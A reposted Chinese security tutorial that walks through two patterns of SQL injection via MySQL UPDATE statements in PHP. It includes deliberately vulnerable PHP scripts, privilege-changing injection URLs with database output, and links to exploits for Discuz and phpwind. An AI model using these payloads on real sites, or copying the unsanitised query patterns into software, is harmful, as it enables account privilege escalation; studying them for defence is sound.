登录社区:用户名: 密码: 忘记密码 网页功能:加入收藏 设为首页 网站搜索  

文档

下载

图书

论坛

安全

源码

硬件

游戏
首页 信息 空间 VB VC Delphi Java Flash 补丁 控件 安全 黑客 电子书 笔记本 手机 MP3 杀毒 QQ群 产品库 分类信息 编程网站
  立华软件园 - 安全技术中心 - 技术文档 - 漏洞分析 技术文章 | 相关下载 | 电子图书 | 攻防录像 | 安全网站 | 在线论坛 | QQ群组 | 搜索   
 安全技术技术文档
  · 安全配制
  · 工具介绍
  · 黑客教学
  · 防火墙
  · 漏洞分析
  · 破解专题
  · 黑客编程
  · 入侵检测
 安全技术工具下载
  · 扫描工具
  · 攻击程序
  · 后门木马
  · 拒绝服务
  · 口令破解
  · 代理程序
  · 防火墙
  · 加密解密
  · 入侵检测
  · 攻防演示
 安全技术论坛
  · 安全配制
  · 工具介绍
  · 防火墙
  · 黑客入侵
  · 漏洞检测
  · 破解方法
 其他安全技术资源
  · 攻防演示动画
  · 电子图书
  · QQ群组讨论区
  · 其他网站资源
最新招聘信息

UPDATE注射(mysql+php)的两个模式
发表日期:2006-03-12作者:HeiGe[转贴] 出处:安全焦点  

UPDATE注射(mysql+php)的两个模式
                             文/安全天使·SuperHei 2005.8.11
一.测试环境:
OS: Windowsxp sp2
php: php 4.3.10 (
mysql 4.1.9
apache 1.3.33

二.测试数据库结构:
-----start---
-- 数据库: `test`
--

-- --------------------------------------------------------

--
-- 表的结构 `userinfo`
--

CREATE TABLE `userinfo` (
  `groudid` varchar(12) NOT NULL default '1',
  `user` varchar(12) NOT NULL default 'heige',
  `pass` varchar(122) NOT NULL default '123456'
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

--
-- 导出表中的数据 `userinfo`
--

INSERT INTO `userinfo` VALUES ('2', 'heige', '123456');
------end-------

三.测试模式:
1,变量没有带''或""[MOD1]

<?php
//test1.php Mod1
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass=$p where user='heige'";//<--$P没有使用单引号

$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);

echo "<p>SQL Query:$sql<p>";
?>

脚本里只是修改user='heige'的pass,如果groudid表示用户的权限等级,我们的目的就是通过构造$p 来达
到修改groupid的目的:

那么我们提交:http://127.0.0.1/test1.php?p=123456,groudid=1

在mysql里查询:
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user  | pass   |
+---------+-------+--------+
| 1       | heige | 123456 |
+---------+-------+--------+
1 row in set (0.01 sec)

用户heige的groudid又2改为1了 :)

所以我们可以得到没有''或"" update的注射是可以成功的,这个就是我们的模式1。

2,变量带''或""[MOD2]

<?php
//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass='$p' where user='heige'";//<--$P使用单引号

$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);

echo "<p>SQL Query:$sql<p>";
?>

为了关闭'我们构造$p应该为123456',groudid='2 提交:
http://127.0.0.1/test2.php?p=123456',groudid='1 在gpc=on的情况下'变成了\'
提交的语句变成:SQL Query:update userinfo set pass='123456\',groudid=\'1' where user='heige'

mysql查询:
mysql> select * from userinfo;
+---------+-------+--------------------+
| groudid | user  | pass               |
+---------+-------+--------------------+
| 2       | heige | 123456',groudid='1 |
+---------+-------+--------------------+
1 row in set (0.00 sec)

groudid并没有被修改。那么在变量被''或""时 就完全没有被注射呢?不是 下面我们看模式2:

<?php
//test3.php Mod2
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass='$p' where user='heige'";//<--$P使用单引号

$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result);    //$p的数据写入数据库

$sql= "select pass from userinfo where user='heige'";
$result = mysql_db_query($dbname, $sql);
$userinfo=mysql_fetch_array($result);

echo $userinfo[0];  //把pass查询输出给$userinfo[0]

$sql ="update userinfo set pass='$userinfo[0]' where user='heige'";
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //把$userinfo[0] 再次update

?>

我们测试下,提交:http://127.0.0.1/test3.php?p=123456',groudid='1
回mysql查询下 :
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user  | pass   |
+---------+-------+--------+
| 1       | heige | 123456 |
+---------+-------+--------+
1 row in set (0.00 sec)

HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下:

update-->select-->update

四.实际模式
模式1:Discuz 2.0/2.2 register.php 注射
       漏洞分析:http://4ngel.net/article/41.htm
       Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm
模式2:phpwind 2.0.2和3.31e 权限提升漏洞
       漏洞分析:
           update (profile.php 注射变量为$proicon update语句里为,icon='$userdb[icon]')
              |
              v
           select (jop.php)
              |
              v
           updtate (jop.php)
          
       Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe

五.鸣谢
   特别感谢saiy等朋友的讨论和帮助。Thanks!!!

我来说两句】 【发送给朋友】 【加入收藏】 【返加顶部】 【打印本页】 【关闭窗口
中搜索 UPDATE注射(mysql+php)的两个模式

 ■ [欢迎对本文发表评论]
用  户:  匿名发出:
您要为您所发的言论的后果负责,故请各位遵纪守法并注意语言文明。

最新招聘信息

关于我们 / 合作推广 / 给我留言 / 版权举报 / 意见建议 / 广告投放 / 友情链接  
Copyright ©2001-2006 Lihuasoft.net webmaster(at)lihuasoft.net
网站编程QQ群   京ICP备05001064号 页面生成时间:0.0019